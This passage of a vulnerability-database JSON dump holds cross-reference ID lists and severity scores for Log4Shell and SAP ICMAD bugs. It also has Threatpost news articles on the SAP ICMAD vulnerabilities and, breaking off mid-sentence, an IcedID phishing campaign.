"QUALYSBLOG:3FADA4B80DBBF178154C0729CFC1358F", "QUALYSBLOG:42335884011D582222F08AEF81D70B94", "QUALYSBLOG:5059D1C3913FB6542F3283A66F9B3A43", "QUALYSBLOG:5F3A665821FA30373004EC52F5104E15", "QUALYSBLOG:5FAC1C82A388DBB84ECD7CD43450B624", "QUALYSBLOG:68BBBF644900DA0A883AABB0E4E3F28B", "QUALYSBLOG:6C71B912ABF74BE51F014EC90669CF30", "QUALYSBLOG:A0F20902D80081B44813D92C6DCCDAAF", "QUALYSBLOG:C2ECE416E32C6CC230B13471D41A4E03", "QUALYSBLOG:C3C14B989683A02C2C9A98CE918FBC3C", "QUALYSBLOG:CAF5B766E6B0E6C1A5ADF56D442E7BB2", "QUALYSBLOG:D38E3F9D341C222CBFEA0B99AD50C439"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:02EDDA927928C11A6D10A4A0D17823AF", "RAPID7BLOG:0576BE6110654A3F9BF7B9DE1118A10A", "RAPID7BLOG:078D5EE222682A75AE1A1A3A3684E38D", "RAPID7BLOG:0C5C51ED53983B92C7C9805E820366C9", "RAPID7BLOG:18CF89AA3B9772E6A572177134F45F3A", "RAPID7BLOG:18D49792276E208F17E7D64BCE2FDEF6", "RAPID7BLOG:1D39E7BBA13704DCBB8153C89ABE6B72", "RAPID7BLOG:24E0BE5176F6D3963E1824AD4A55019E", "RAPID7BLOG:2FC92FBE5A4445611C80C7C3FA7D9354", "RAPID7BLOG:2FFDE45F01FA44216BE91DD7AFA0D060", "RAPID7BLOG:45B045D2EE21432DF9939E4402522BFC", "RAPID7BLOG:4CDB288231FA4BF52C0067D9D4FEABBF", "RAPID7BLOG:602109CBDD808C41E4DDC9FBC55E144D", "RAPID7BLOG:6EADCD983283E3D546EF2907978E95F1", "RAPID7BLOG:6F833E0DB9E152EB8397D33430FECB7F", "RAPID7BLOG:7767347A5784FF1C4901601A1A21D2C8", "RAPID7BLOG:7F1312E79E0925118565C90443170051", "RAPID7BLOG:97E3CA7ED938F3DF6E967C832F314FA3", "RAPID7BLOG:9CB105938BDE92F573A2DE68BC20CF46", "RAPID7BLOG:AB5C0BC130F45073226CC41D25680EA0", "RAPID7BLOG:AF9E6199C63A57B22FAE6AAEDD650D39", "RAPID7BLOG:B6DE24165AA9AA83EDA117170EDDAD44", "RAPID7BLOG:BE60EE9A1ACB3CEE4593041ECAFA8D95", "RAPID7BLOG:C6C1B8357ABD28AEB0F423A0A099098A", "RAPID7BLOG:CB62092B4C7E70876CF276BA04DD7597", "RAPID7BLOG:D185BF677E20E357AFE422CFB80809A5", "RAPID7BLOG:D1E1A150733F5AFC2C704DB26E7EAB30", "RAPID7BLOG:E3D08ECAA9A93569D5544F4D6AAEEB74", "RAPID7BLOG:E43819A7DE1DD0F60E63E67A27B9301B", "RAPID7BLOG:ED80467D2D29D8DC10E754C9EA19D9AD", "RAPID7BLOG:F14526C6852230A4E4CF44ADE151DF49", "RAPID7BLOG:F14E17E573386DB3DDD27A8E829E49A1", "RAPID7BLOG:F37BD0C67170721734A26D15E6D99B3E", "RAPID7BLOG:F76EF7D6AB9EB07FC8B8BCE442DC3A69", "RAPID7BLOG:F9B4F18ABE4C32CD54C3878DD17A8630", "RAPID7BLOG:FB97B7B381BE98BE0077666DFDEC1953", "RAPID7BLOG:FBEE52CB3C438E4C42D6212E07BEFEA9"]}, {"type": "redhat", "idList": ["RHSA-2021:5093", "RHSA-2021:5094", "RHSA-2021:5106", "RHSA-2021:5107", "RHSA-2021:5108", "RHSA-2021:5126", "RHSA-2021:5127", "RHSA-2021:5128", "RHSA-2021:5129", "RHSA-2021:5130", "RHSA-2021:5132", "RHSA-2021:5133", "RHSA-2021:5134", "RHSA-2021:5137", "RHSA-2021:5138", "RHSA-2021:5140", "RHSA-2021:5141", "RHSA-2021:5148", "RHSA-2021:5183", "RHSA-2021:5184", "RHSA-2021:5186", "RHSA-2022:0082", "RHSA-2022:0083", "RHSA-2022:0203", "RHSA-2022:0205", "RHSA-2022:0216", "RHSA-2022:0222", "RHSA-2022:0223", "RHSA-2022:0296", "RHSA-2022:1296", "RHSA-2022:1297", "RHSA-2022:1299"]}, {"type": "redhatcve", "idList": ["RH:CVE-2021-4104", "RH:CVE-2021-4125", "RH:CVE-2021-44228", "RH:CVE-2021-44832", "RH:CVE-2021-45046", "RH:CVE-2021-45105"]}, {"type": "securelist", "idList": ["SECURELIST:0ED76DA480D73D593C82769757DFD87A", "SECURELIST:52D1B0F6F56EE960CC02B969556539D6", "SECURELIST:7A375F44156FACA25A0B3990F2CD73C1", "SECURELIST:9CC623A02615C07A9CEABD0C58DE7931", "SECURELIST:C1F2E1B6711C8D84F3E78D203B3CE837", "SECURELIST:E21F9D6D3E5AFD65C99FC385D4B5F1DC"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2021:1577-1", "OPENSUSE-SU-2021:1586-1", "OPENSUSE-SU-2021:1601-1", "OPENSUSE-SU-2021:1613-1", "OPENSUSE-SU-2021:3999-1", "OPENSUSE-SU-2021:4094-1", "OPENSUSE-SU-2021:4107-1", "OPENSUSE-SU-2021:4109-1"]}, {"type": "symantec", "idList": ["SMNTC-19793"]}, {"type": "talosblog", "idList": ["TALOSBLOG:0AA83DE1427426ABF4723FDF049F6EEB", "TALOSBLOG:AFFA9F54A1744A8B65903B06E9C56C3A", "TALOSBLOG:C9F50677FB4030903E6114F7C17FD8DB"]}, {"type": "thn", "idList": ["THN:161777F5DB73EF3AB5B13EF9F11E3374", "THN:1D10167F5D53B2791D676CF56488D5D9", "THN:221BD04ADD3814DC78AF58DFF41861F3", "THN:2656971C06C4E3D4B0A8C0AC02BBB775", "THN:365025B2416483B34C70F02EDA44131E", "THN:368B6517F020AB4BF1B2344EDC8234A4", "THN:4DE731C9D113C3993C96A773C079023F", "THN:5BAE3325983F971D1108722C454FF9AB", "THN:5CB7AEBFFE369D293598A4FDBFDFCEE3", "THN:602D65D576B090BAC4B0C96998F8F922", "THN:668DE2C9CFD709125451AF8F3FE12E6C", "THN:686DDFA07B415C41BA7AB9B8970557EF", "THN:76D7572EDBE770410D6F0518DAD8B0AD", "THN:76F500CE84314456F7B0E4DD1D56D971", "THN:7958F9B1AA180122992C6A0FADB03536", "THN:802C6445DD27FFC7978D22CC3182AD58", "THN:833B2B9623F1C64D20868B947E8BE4E0", "THN:83D31EE6B3E59778D812B3B7E67D7CD6", "THN:8755093D287CCB8F16A1A7CD3BDB6ACF", "THN:933FE23273AB5250B949633A337D44E1", "THN:AFF2BD38CB9578D0F4CA96A145933627", "THN:C73B84809CDC20C90C26FF1B7F56F5D4", "THN:CE191128AE56CD5C614344408C285C87", "THN:DF2B6840863D6847D7088B1A07B19A4A", "THN:E27BF56DBA34B1A89BD29AEB5A6D8405", "THN:E7E8D45492BAD83E88C89D34F8502485", "THN:ECDABD8FB1E94F5D8AFD13E4C1CB5840"]}, {"type": "threatpost", "idList": ["THREATPOST:02A472487653A461080415A3F7BB23D2", "THREATPOST:03FC9E97BBF9730C5990E8A220DD5E9A", "THREATPOST:065F7608AC06475E765018E97F14998D", "THREATPOST:075BA69792AA7B1AE4C28E1CBE61E360", "THREATPOST:08E51C6FB9418179611DF2ACFB1073BF", "THREATPOST:09118C676E28AC5D7BB791E76F75453C", "THREATPOST:0B290DDF3FE14178760FDC2229CB1383", "THREATPOST:0C3BAA4DB9E2B5E8A30DD20A987FCE03", "THREATPOST:0FD7F2FA7F2D3383F582553124EA843D", "THREATPOST:10245D9804511A09607265485D240FFF", "THREATPOST:10D0F1DDDD6C211DA3CE6395900B7C54", "THREATPOST:1309DBA0F8A2727965C6FA284A002D3B", "THREATPOST:138507F793D8399AF0EE1640C46A9698", "THREATPOST:138F67583DAC26A61D1AB90A018F1250", "THREATPOST:13D4AE4C03A3BF687491FDA1E8D732C7", "THREATPOST:14D52B358840B9265FED987287C1E26E", "THREATPOST:16624FA0DF55AAB9FDB3C14AC91EC9F5", "THREATPOST:16877B149E701CC4DB69E91C567D79CC", "THREATPOST:187B01687ED5D3975CD6E42E84DD9B13", "THREATPOST:19BDD881931703B28F7B93492E0C75FD", "THREATPOST:1A553B57472BB0EB8D69F573B510FDE6", "THREATPOST:1B42481449E86FEA3940A2E1E2634309", "THREATPOST:1BE6320CDA6342E72A5A2DD5E0758735", "THREATPOST:1CC682A86B6D521AD5E357B9DB3A1DFB", "THREATPOST:1EB961A6936CB97E2DE6C0212349367F", "THREATPOST:1F99A9A6A418194B87E5468CC8344FBF", "THREATPOST:20F9B8CE2D092108C0F78EC3E415F6B4", "THREATPOST:2188E3E33D86C2C3DF35253A3ED7FA6C", "THREATPOST:2246F7085606B44A031DC14D1B54B9DB", "THREATPOST:23B6C10D7EF469BE8ED27D1C9AFB526A", "THREATPOST:2707644CA0FB49ADD0ECA1B9AFDA0E8A", "THREATPOST:27C5AA551B5793DEA8848FB76DE52B32", "THREATPOST:280ACEC9B5A634E74F3C321F272C3EF3", "THREATPOST:2C0E12580D3C2F1CE7880F6955D4AA1E", "THREATPOST:305513A61FA2B0EF500854C82DF34A9C", "THREATPOST:31091088EDBCEEF43F75A2BA2387EB5C", "THREATPOST:31D14CEE5977BF71F79F7C30AEC10698", "THREATPOST:34D98758A035C36FED68DDD940415845", "THREATPOST:3697F9293A6DFF6CD5927E9E68FF488A", "THREATPOST:38E044431D55F0A4BC458FF92EB025BF", "THREATPOST:38E8D69F26ADB15A989532924B2A98C4", "THREATPOST:3A1C8593C0AAEFA3AF77D1A207BD0B65", "THREATPOST:3A5F59D56E40560C393A3F69A362A31B", "THREATPOST:3ADFDD3CC93B03F83C2CEC5583B016AB", "THREATPOST:3B06E49AA3C9F001C97038682A9BF73F", "THREATPOST:3B8B02F621E9D9883A541B1B26BDF410", "THREATPOST:3DB85AFFEA9491ACBD8909D0CF5FBAEA", "THREATPOST:3EDC338ECB2601F5A49A9ED5E087B776", "THREATPOST:3FDED0EC415BA165368B72AB2A8E1A59", "THREATPOST:40A09F08F388BACF08E0931C6473DE0C", "THREATPOST:40A6B1288BA6177BA30307804BE630D0", "THREATPOST:41B10746D1F4B74DA188CB140A8B2676", "THREATPOST:42AAB266C740220CFF57204DDF71129E", "THREATPOST:436D209F4CB01B99FC9576DFE08DE145", "THREATPOST:45B63C766965F5748AEC30DE709C8003", "THREATPOST:46837E7270195429E1D891848E911254", "THREATPOST:46AF5D5C752ADF689DA52FBDA4644F5D", "THREATPOST:47481707E9A4BF7FC15CC47EC8A8F249", "THREATPOST:48A631F2D45804C677BB672F838F29DA", "THREATPOST:48FD4B4BFA020778797D684672C283B0", "THREATPOST:49177F7B5015CE94637C97F64C2D4138", "THREATPOST:4B8076F30D5D67336733D7FFBCBD929A", "THREATPOST:4C9E0FFA5C914E395A66D2DC65B16649", "THREATPOST:4D63851D1493E3861204B674ADBC7F01", "THREATPOST:4D892A0342695D6703703D63DCC1877C", "THREATPOST:4EEFA1A0FABB9A6E17C3E70F39EB58FE", "THREATPOST:503327A6AB0C76621D741E281ABCFF77", "THREATPOST:5531DA413E023731C17E5B0771A25B3D", "THREATPOST:57F52943964BADEBC748C4AC796CEEB6", "THREATPOST:590E1D474E265F02BA634F492F728536", "THREATPOST:5B680BEF3CD53FFB3B871FF7365A4C47", "THREATPOST:5B9D3D8DB4BFEDE846215C1877B275ED", "THREATPOST:5CCE0C2607242B16B2880B331167526C", "THREATPOST:5F6690E820E1B143D99DD5974300C6FF", "THREATPOST:6067B6D35C99BFCFF226177541A31F69", "THREATPOST:647D7D894452D9C46B3E86F5491EED49", "THREATPOST:65DB14FD89BCDBD3391ADD70F1377E70", "THREATPOST:65F4E74D349524EBAC2DA4A4ECF22DD8", "THREATPOST:6675B640474BF8A8A3D049DB0266A118", "THREATPOST:66848A3C9B8917C8F84DFDC04DD5F6D9", "THREATPOST:68B92CE2FE5B31FB78327BDD0AB7F21C", "THREATPOST:6C547AAC30142F12565AB289E211C079", "THREATPOST:6D28B6E17A92FE11F55907C143B3F5DD", "THREATPOST:751A0E2371F134F90F39C20AB70C1E2A", "THREATPOST:76A072EE53232EB197F119EC2F7EAA74", "THREATPOST:76A5549135F9D578FFC2C8FACC135193", "THREATPOST:77DB31E826E03EA9D78EE4777986EA49", "THREATPOST:78327DA051387C43A61D82DE6B618D1F", "THREATPOST:795C39123EE147B39072C9434899E8FE", "THREATPOST:796DFA4804FEF04D3787893FCDFF97D2", "THREATPOST:7DDE7BA7A7916763BDDB5D0C565285DA", "THREATPOST:81021088670E95FC0EBB2F53E1FB2AD2", "THREATPOST:8105FA1422BB4E02CD95C23CC7405E26", "THREATPOST:81DEAED9A2A367373ADA49F1CCDCA95D", "THREATPOST:8243943141B8F18343765DA77D33F46C", "THREATPOST:8594A8F12FC5C97E7E62AF7B9BE3F1AA", "THREATPOST:8601D6EF6AB3201E582A218391B19C3F", "THREATPOST:8648A1E46B6EBE5300881DE285C7D080", "THREATPOST:883A7DED46A4E1C743AFFBA7CDCF4400", "THREATPOST:89AA48C3C48FA427AB660EDEE6DBCBE2", "THREATPOST:8A372065BFA1E6839DAF0386E9D8A1F5", "THREATPOST:8B78588647E8548B06361DBB1F279468", "THREATPOST:8D57BD39C913E8DDC450DD9EF2564C2C", "THREATPOST:8E47F9D5A51C75BA6BB0A1E286296563", "THREATPOST:8FFF44C70736D8E21796B9337E52F29D", "THREATPOST:932AA74F12B9D2AD0E8589AC1A2C1438", "THREATPOST:9374ECD9CCFC891FC2F3B85DF0905A1C", "THREATPOST:95BDCA2096B58A0697E169C01B1E0F09", "THREATPOST:970C9E73DF1FF53D70DB0B66326F3CB0", "THREATPOST:97D06649A596B5E25E2A11E3D275748B", "THREATPOST:97F7CB48069CDF8038E5E49508EFA458", "THREATPOST:987673B6BC03D7371ADC88E9BDA270D5", "THREATPOST:98F735BF442C3126E4A9FFBB60517B96", "THREATPOST:9922BFA77AFE6A6D35DFEA77A4D195C0", "THREATPOST:99C6C1555ACD07B4925765AED21A360C", "THREATPOST:9D96113FADFD4FBCA9C17B78B53A8C93", "THREATPOST:9E222E9232D1D59183559B17E97BADCD", "THREATPOST:A07707C9B30B86A691C1A24C4DC65EE6", "THREATPOST:A1F3E8AC4878C11E48F90AC47D165F52", "THREATPOST:A6096ACCB3F0C38BC6570E1DDE3E8844", "THREATPOST:A98C64CB9BDDE55F51C984B749753904", "THREATPOST:AB54F1EB518D88546D1EF9DBA5E1874B", "THREATPOST:AE9B4708A7A9B6F3A24C35E15C6150A4", "THREATPOST:AFD74E86954C5A08B3F246887333BDF3", "THREATPOST:B04DD1402960F4726546F62371A02B3C", "THREATPOST:B11E42D0B4C56E4CC482DEF6EA0B4AC7", "THREATPOST:B2FEDF3EA50507F526C77105093E8977", "THREATPOST:B318814572E066732E6C32CC147D95E2", "THREATPOST:B3A92C43D5FF3C53BE8EF06C687B80B6", "THREATPOST:B796D491D9E59A6CE14A74FFE427D175", "THREATPOST:B7C8B7F3016D73355C4ED5E05B0E8490", "THREATPOST:B9CCF4B8B7E25CEC369B248303882707", "THREATPOST:BA0FA5036C385C822C787514850A67E5", "THREATPOST:BDCC3D007E103708BD7CA085B29EF2CB", "THREATPOST:BE11CFFFFEA1B470C8A24CA24D76A7C6", "THREATPOST:C3C8E90FB9A6A06B1692D70A51973560", "THREATPOST:C4369D60DE77B747298623D4FD0299B3", "THREATPOST:C4B358E42FF02B710BE90F363212C84F", "THREATPOST:C573D419AD6106E6579CCA4A18E2DBBE", "THREATPOST:C694354BA14A953DAFC9171CB97F0BC2", "THREATPOST:C6D292755B4D35E7E0FD459BBF6AFC7F", "THREATPOST:C754ECCAF3F8A3E6BCD670A88B3E4CAA", "THREATPOST:C9D2DB62AC17B411BFFF253D149E56F2", "THREATPOST:C9FBCC2A1C52CDB54C6AAB18987100F4", "THREATPOST:CAA9AA939562959323A4675228C233A5", "THREATPOST:CD9589D22198CE38A27B7D1434FEE963", "THREATPOST:CEEE25A4A4491980FA1ECB491795DBA9", "THREATPOST:CF3033203781AAC4EAAE83DDCF93ADE8", "THREATPOST:CF4E98EC11A9E5961C991FE8C769544E", "THREATPOST:CF93F3E6D1E96AACFAEE9602C90A711D", "THREATPOST:D098942E4435832E619282E1B92C9E0F", "THREATPOST:D240DF7FEF328139784DBE743FF84E9B", "THREATPOST:D358CF7B956451F0C53F878AF811409F", "THREATPOST:D5E02B5FD2809DCACF41DA1190794921", "THREATPOST:D7D5E283A1FBB50F8BD8797B0D60A622", "THREATPOST:DB4349EAC3DD60D03D1EBDEFF8ABAA8E", "THREATPOST:DC76A72269F271882F45A521CF7C3509", "THREATPOST:DE6A0C7ECE2973F596891B00DC078055", "THREATPOST:DF2C6B28792FEC8F2404A7DC366B848F", "THREATPOST:E09CE3FA2B76F03886BA3C2D4DB4D8DB", "THREATPOST:E0C8A3622AEF61D726EED997C39BADFE", "THREATPOST:E424D9CD1C692F91FBD97FDDEDBCCE34", "THREATPOST:E60D2D0CCA5A225CA4BF5CEB5C7C3F59", "THREATPOST:E8074A338A246BED98CF95AD4F4E9CAF", "THREATPOST:E8A3AD011F9759F38AAB48D776396878", "THREATPOST:EC28F82F6C3ECD5D0BA7471D5BA50FD6", "THREATPOST:EE0A71A925297032000651C344890BDD", "THREATPOST:F12423DD382283B0E48D4852237679FC", "THREATPOST:F72FDE7CB5D697EFD089937D42475E50", "THREATPOST:F87A6E1CF3889C526FDE8CE50A1B81FF", "THREATPOST:FC38FE49CDC6DFAD4E78D669DBFA5687", "THREATPOST:FDD0C98FAA16831E7A3B7CCE3BFC67FF", "THREATPOST:FDF0EE0C54F947C5167E6B227E92AE63", "THREATPOST:FE7B13B35ED49736C88C39D5279FA3D1"]}, {"type": "trellix", "idList": ["TRELLIX:357BDB16F9C97C350D8CFF381DE2C04E", "TRELLIX:39F5630F37B0A70500113404A73FE414", "TRELLIX:73420774AE3767CFB11F493B41572174", "TRELLIX:7B9C31B3E2F1A079101A700230D5A5C0", "TRELLIX:908157CFA8050AA23921170E873187E1", "TRELLIX:D57FEAD5DBF6D915430C791AC26C10CC", "TRELLIX:ED6978182DFD9CD1EA1E539B1EDABE6C"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:C927C873A9E9A7AF6B74D64EFAFA6B02"]}, {"type": "typo3", "idList": ["TYPO3-PSA-2021-004"]}, {"type": "ubuntu", "idList": ["USN-5192-1", "USN-5192-2", "USN-5197-1"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2021-4104", "UB:CVE-2021-44228", "UB:CVE-2021-45046"]}, {"type": "veeam", "idList": ["VEEAM:KB4254"]}, {"type": "veracode", "idList": ["VERACODE:33244", "VERACODE:33337", "VERACODE:33348"]}, {"type": "vmware", "idList": ["VMSA-2021-0028.1", "VMSA-2021-0028.10", "VMSA-2021-0028.11", "VMSA-2021-0028.12", "VMSA-2021-0028.13", "VMSA-2021-0028.2", "VMSA-2021-0028.3", "VMSA-2021-0028.4", "VMSA-2021-0028.6", "VMSA-2021-0028.7", "VMSA-2021-0028.8", "VMSA-2021-0028.9"]}, {"type": "wallarmlab", "idList": ["WALLARMLAB:060FBB90648BCDE11554492408AE89C8", "WALLARMLAB:2AAA5E62EED6807B93FB40361B4927CB", "WALLARMLAB:90D3FFE69FF928689D36310EF8B1C4F3", "WALLARMLAB:E86F01AF50087BEB03AAB46947CDE884"]}, {"type": "wordfence", "idList": ["WORDFENCE:107445D672F037011ADA9A0DA9FB8292", "WORDFENCE:45390D67D024DD8C963E18DAE88303B2"]}, {"type": "zdt", "idList": ["1337DAY-ID-37135", "1337DAY-ID-37136", "1337DAY-ID-37228", "1337DAY-ID-37257", "1337DAY-ID-37264", "1337DAY-ID-37889", "1337DAY-ID-38098"]}]}, "exploitation": null, "score": {"value": 0.2, "vector": "NONE"}, "epss": [{"cve": "CVE-2021-44228", "epss": "0.975780000", "percentile": "0.999980000", "modified": "2023-03-18"}, {"cve": "CVE-2022-22532", "epss": "0.001790000", "percentile": "0.533530000", "modified": "2023-03-18"}, {"cve": "CVE-2022-22533", "epss": "0.000880000", "percentile": "0.360230000", "modified": "2023-03-18"}, {"cve": "CVE-2022-22536", "epss": "0.965920000", "percentile": "0.993180000", "modified": "2023-03-18"}], "vulnersScore": 0.2}, "_state": {"dependencies": 1678920471, "score": 1698844884, "epss": 1679178262}, "_internal": {"score_hash": "f4339e5a6b58a9633685babcc65d6373"}}

{"threatpost": [{"lastseen": "2022-02-10T17:51:24", "description": "There\u2019s a trio of critical vulnerabilities, fixed on Tuesday, in SAP business applications that use the ubiquitous Internet Communication Manager (ICM): the component that gives SAP products the HTTPS web server they need to connect to the internet or talk to each other.\n\nThe vulnerabilities, discovered by Onapsis Research Labs, are tracked as CVE-2022-22536, CVE-2022-22532 and CVE-2022-22533. The first CVE, addressed in [Security Note 3123396](<https://launchpad.support.sap.com/>), received the tip-top risk score \u2013 a 10 out of 10. The other two CVEs received scores of 8.1 and 7.5, respectively.\n\nThe issues are severe enough that the U.S. Cybersecurity and Infrastructure Security Agency (CISA) issued a [security advisory](<https://www.cisa.gov/uscert/ncas/current-activity/2022/02/08/critical-vulnerabilities-affecting-sap-applications-employing>) about them this week. And, in a [blog post](<https://blogs.sap.com/2022/02/08/sap-partners-with-onapsis-to-identify-and-patch-cybersecurity-vulnerabilities/>), SAP director of security response Vic Chung confirmed the severity of Onapsis\u2019 findings. He said that if they aren\u2019t remediated, the bugs \u2013 aka \u201cICMAD\u201d \u2013 \u201cwill enable attackers to execute serious malicious activity on SAP users, business information and processes.\u201d\n\nSpecifically, successful exploitation could lead to this frightening laundry list of cybersecurity hazards:\n\n * Hijack of user identities, theft of all user credentials and personal information\n * Exfiltration of sensitive or confidential corporate information\n * Fraudulent transactions and financial harm\n * Change of banking details in a financial system of record\n * Denial-of-service attack that disrupts critical systems for the business\n\nOnapsis, which specializes in security for SAP, Oracle, Salesforce and other software-as-a-service (SaaS) platforms, joined SAP in coordinating the release of[ a Threat Report](<https://onapsis.com/icmad-sap-cybersecurity-vulnerabilities?utm_campaign=2022-Q1-global-ICM-campaign-page&utm_medium=website&utm_source=third-party&utm_content=CISA-alert>) describing the critical vulnerabilities on Tuesday.\n\nThe firm estimated that there were tens of thousands \u2013 approximately 40,000 \u2013 SAP customers running more than 10,000 potentially affected, internet-exposed SAP applications at the time of disclosure.\n\nSAP and Onapsis urged customers to apply both Security Note 3123396 and [3123427](<https://t.nylas.com/t1/116/4a3z713b1kum7z18ruaq7siqk/13/51ec755ca6f695096592b0335df2b6ec4ba279684d0ae63b9df0739442312162>) without delay. Onapsis also provided a free, open-source vulnerability scanner tool to assist SAP customers in addressing the serious issues, available to download [here](<https://github.com/Onapsis/onapsis_icmad_scanner>).\n\n## No Known Related Breaches \u2013 Yet\n\n\u201cSince ICM is exposed to the internet and untrusted networks by design, vulnerabilities in this component have an increased level of risk,\u201d Chung said.\n\nThe ICMAD bugs are critical memory-corruption vulnerabilities that should be patched promptly, given that ICM is a core component of SAP business applications \u2013 just one flavor of the business-critical apps that threat actors are actively targeting.\n\n\u201cAs we have observed through recent threat intelligence, threat actors are actively targeting business-critical applications like SAP and have the expertise and tools to carry out sophisticated attacks,\u201d said Mariano Nunez, CEO and co-founder of Onapsis. \u201cThe discovery and patching of the ICMAD vulnerabilities as well as those previously identified by Onapsis Research Labs, such as[ RECON](<https://onapsis.com/recon-sap-cyber-security-vulnerability>) and[ 10KBLAZE](<https://onapsis.com/resources/10kblaze>), are essential to protecting the business-critical applications that power 92 percent of the Forbes Global 2000.\u201d\n\nAs of Tuesday, SAP and Onapsis weren\u2019t aware of any breaches related to the trio of bugs, but that\u2019s clearly no reason to delay in applying the updates in[ Security Note 3123396 [CVE-2022-22536]](<https://launchpad.support.sap.com/>) to affected SAP applications as soon as possible, they said.\n\n## What to Do\n\nOnapsis has prepared this on-demand [recording](<https://hubs.ly/Q013KNxr0>) that details what to do to avoid any damage.\n\nAs well, at noon ET on Thursday, Onapsis\u2019 Nunez and SAP CISO Richard Puckett will provide a [threat briefing](<https://twitter.com/marianonunezdc/status/1491803623709310977>) about the ICMAD vulnerabilities.\n\n> Join SAP's [#CISO](<https://twitter.com/hashtag/CISO?src=hash&ref_src=twsrc%5Etfw>) Richard Puckett and me on the threat briefing about the [#icmad](<https://twitter.com/hashtag/icmad?src=hash&ref_src=twsrc%5Etfw>) vulnerabilities. Make sure you have all the info to protect your business-critical SAP applications. Today at 12pm ET. [#sap](<https://twitter.com/hashtag/sap?src=hash&ref_src=twsrc%5Etfw>) [#onapsis](<https://twitter.com/hashtag/onapsis?src=hash&ref_src=twsrc%5Etfw>) [#research](<https://twitter.com/hashtag/research?src=hash&ref_src=twsrc%5Etfw>) [#cisa](<https://twitter.com/hashtag/cisa?src=hash&ref_src=twsrc%5Etfw>) [#icm](<https://twitter.com/hashtag/icm?src=hash&ref_src=twsrc%5Etfw>) [#security](<https://twitter.com/hashtag/security?src=hash&ref_src=twsrc%5Etfw>) <https://t.co/QObvbdN6sp>\n> \n> \u2014 Mariano Nunez (@marianonunezdc) [February 10, 2022](<https://twitter.com/marianonunezdc/status/1491803623709310977?ref_src=twsrc%5Etfw>)\n\n## Internally Facing Apps Also at Risk\n\nA vulnerability in ICM exposes the business-critical data enterprises depend on SAP to manage and safeguard, pointed out Casey Bisson, head of product and developer relations at code-security provider BluBracket. That goes for internal-facing apps as well as internet-facing ones, he said, given that ICM is at the core of practically all SAP-based web applications, and that includes apps that are internal-only.\n\n\u201cEven if the applications are internal-only, there\u2019s still risk when combined with other threats, including disgruntled employees and compromised network devices,\u201d he told Threatpost via email on Thursday. \u201cThis is exactly the vulnerability that threat actors like ransomware operators and state operatives are looking for.\u201d\n\nSAP servers are \u201cextremely rich targets,\u201d noted Aaron Turner, vice president of software-as-a-service (SaaS) posture at AI cybersecurity company Vectra. They have \u201csignificant\u201d access to material business processes and, generally, have multiple privileged credentials stored and used on those servers, he said via email.\n\n\u201cWith the Onapsis research, they have uncovered an exploit path that allows attackers to gain access to those privileged credentials to move laterally within the on-premises network, and also pivot into the cloud as most SAP customers have federated their legacy SAP workloads with cloud-based ones,\u201d Turner explained.\n\nHe compared the potential for exploitation to that presented by [Hafnium](<https://threatpost.com/hades-ransomware-connections-hafnium/165069/>): an advanced persistent threat (APT) believed to be linked to the Chinese government that Microsoft said has carried out zero-day attacks on Microsoft Exchange servers using the group of vulnerabilities known as [ProxyLogon](<https://threatpost.com/microsoft-exchange-servers-proxylogon-patching/165001/>).\n\n\u201cJust as Hafnium allowed attackers to pivot from on-prem Exchange to M365, this SAP attack path could allow the same,\u201d Turner suggested. \u201cThe SAP security updates will be critical ones to install, not just to protect those on-premises SAP servers but also any systems, on-prem or cloud, that may share credentials or trust relationships with those servers.\u201d\n\nMike Parkin, engineer at enterprise cyber-risk remediation SaaS provider Vulcan Cyber, told Threatpost that regardless of the current lack of reports of ICMAD exploits, \u201cthe potential risk is high.\u201d\n\nAll the more reason for organizations that rely on the affected components to deploy the patches and other relevant mitigations \u201cas soon as is practical,\u201d he advised.\n\n_021022 12:24 UPDATE: Added input from Casey Bisson, Aaron Turner and Mike Parkin._\n\n_**Check out our free **_[_**upcoming live and on-demand online town halls**_](<https://threatpost.com/category/webinars/>)_** \u2013 unique, dynamic discussions with cybersecurity experts and the Threatpost community.**_\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-02-10T16:39:04", "type": "threatpost", "title": "SAP to Give Threat Briefing on Uber-Severe \u2018ICMAD\u2019 Bugs", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2022-22532", "CVE-2022-22533", "CVE-2022-22536"], "modified": "2022-02-10T16:39:04", "id": "THREATPOST:23B6C10D7EF469BE8ED27D1C9AFB526A", "href": "https://threatpost.com/sap-threat-briefing-severe-icmad-bugs/178344/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-29T14:30:43", "description": "The ever-evolving [banking trojan IcedID](<https://threatpost.com/icedid-web-forms-google-urls/165347/>) is back again with a phishing campaign that uses previously compromised Microsoft Exchange servers to send emails that appear to come from legitimate accounts. Attackers also are using stealthy new payload-delivery tactics to spread the modular malware.\n\nResearchers from [Intezer](<https://www.intezer.com/>) earlier this month uncovered the campaign, which employs thread hijacking to send malicious messages from stolen Exchange accounts, thus adding an extra level of evasion to the campaign\u2019s malicious intent, wrote researchers [Joakim Kennedy](<https://www.intezer.com/author/jkennedy/>) and [Ryan Robinson](<https://www.intezer.com/author/ryanrobinson/>) [in a blog post](<https://www.intezer.com/blog/research/conversation-hijacking-campaign-delivering-icedid/>) published Monday.\n\nThe actors behind IcedID \u2013 as well as other spearphishers \u2013 have previously used phishing emails that \u201creuse previously stolen emails to make the lure more convincing,\u201d researchers wrote. However, this time the threat has evolved in a 